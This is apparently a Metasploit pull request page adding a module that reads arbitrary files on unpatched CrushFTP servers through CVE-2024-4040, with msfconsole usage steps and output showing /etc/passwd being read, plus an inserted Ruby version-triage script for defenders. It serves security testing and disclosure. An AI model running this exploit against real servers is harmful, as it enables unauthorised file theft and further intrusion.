rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Auxiliary module for CVE-2024-4040 - CrushFTP arbitrary file read #19147

Closed remmons-r7 closed 1 week ago

remmons-r7 commented 2 weeks ago

This module leverages an unauthenticated server-side template injection vulnerability in CrushFTP < 10.7.1 and < 11.1.0 (as well as legacy 9.x versions). Attackers can submit template injection payloads to the web API without authentication. When attacker payloads are reflected in the server's responses, the payloads are evaluated. The primary impact of the injection is arbitrary file read as root, which can result in authentication bypass, remote code execution, and NetNTLMv2 theft (when the host OS is Windows and SMB egress traffic is permitted).

Testing

To set up a test environment:

  1. Download an affected version of CrushFTP here.
  2. Configure CRUSH_DIR in crushftp_init.sh to point to the correct install directory.
  3. Execute java -jar CrushFTP.jar to show a local client GUI interface that can be used to set up an admin account.
  4. Execute sudo crushftp_init.sh start to launch the software on Linux or Mac. If on Windows, run CrushFTP.exe as an administrator.
  5. Follow the verification steps below.

Verification

  1. Start msfconsole
  2. use auxiliary/gather/crushftp_fileread_cve_2024_4040
  3. set RHOSTS <TARGET_IP_ADDRESS>
  4. set RPORT <TARGET_PORT>
  5. set TARGETFILE <TARGET_FILE_TO_READ>
  6. set STORE_LOOT false if you want to display file on the console instead of storing it as loot.
  7. run

Example usage

msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > show options 

Module options (auxiliary/gather/crushftp_fileread_cve_2024_4040):

   Name        Current Setting             Required  Description
   ----        ---------------             --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      0.0.0.0                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       443                         yes       The target port (TCP)
   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
   STORE_LOOT  true                        no        Store the target file as loot
   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (if firewalls permit)
   VHOST                                   no        HTTP server virtual host

View the full module info with the info, or info -d command.

msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RPORT 8080
RPORT => 8080
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set STORE_LOOT false
STORE_LOOT => false
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
[*] Running module against 127.0.0.1

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Server-side template injection successful!
[*] Fetching anonymous session cookie...
[*] Using template injection to read file: users/MainUsers/groups.XML
[+] File read succeeded! 
<?xml version="1.0" encoding="UTF-8"?>
<groups type="properties"></groups>

[*] Auxiliary module execution completed

Thank you!
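For defenders triaging an inventory against the affected ranges named in this PR (legacy 9.x, 10.x before 10.7.1, 11.x before 11.1.0), here is an added Ruby example; it is not part of the PR or of the Metasploit module, and the host names and version strings in it are constructed:

```ruby
# Added example (not PR or module code): classify a CrushFTP version string
# against the ranges the PR lists as affected by CVE-2024-4040.

# Parse "10.5.0" -> [10, 5, 0]; a short string such as "11.1" is padded to [11, 1, 0].
def parse_version(str)
  parts = str.to_s.strip.split('.').map { |p| Integer(p, 10) }
  raise ArgumentError, "bad version: #{str.inspect}" if parts.empty? || parts.size > 3
  parts.fill(0, parts.size...3)
end

# First fixed release per major line, as stated in the PR description.
FIXED = { 10 => [10, 7, 1], 11 => [11, 1, 0] }.freeze

# Returns :vulnerable, :patched, or :unknown (a major line the PR says nothing about).
def cve_2024_4040_status(version_str)
  v = parse_version(version_str)
  return :vulnerable if v[0] == 9 # every legacy 9.x build is listed as affected
  fixed = FIXED[v[0]]
  return :unknown unless fixed
  (v <=> fixed) < 0 ? :vulnerable : :patched # element-wise compare of [major, minor, patch]
end

# Map a host => version inventory to host => status; unparseable banners become :unknown.
def triage(inventory)
  inventory.each_with_object({}) do |(host, ver), acc|
    acc[host] = begin
      cve_2024_4040_status(ver)
    rescue ArgumentError
      :unknown
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory, not real hosts.
  sample = { 'ftp-a.example' => '10.5.0', 'ftp-b.example' => '11.1.0', 'ftp-c.example' => '9.4.2' }
  triage(sample).each { |host, status| puts "#{host}: #{status}" }
end
```

Versions outside the 9/10/11 lines come back as :unknown rather than :patched, because the PR only describes those lines.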

cdelafuente-r7 commented 1 week ago

Thanks for updating this @remmons-r7! Everything looks good to me now. I tested against version 10.5.0 and verified the requested file was correctly retrieved. I'll go ahead and land it.

[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Server-side template injection successful!
[*] Fetching anonymous session cookie...
[*] Using template injection to read file: /etc/passwd
[+] File read succeeded!
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

[*] Auxiliary module execution completed

cdelafuente-r7 commented 1 week ago

Release Notes

This adds an exploit module that leverages an unauthenticated server-side template injection vulnerability in CrushFTP versions prior to 10.7.1 and prior to 11.1.0 (as well as legacy 9.x versions) to read any files on the server file system as root.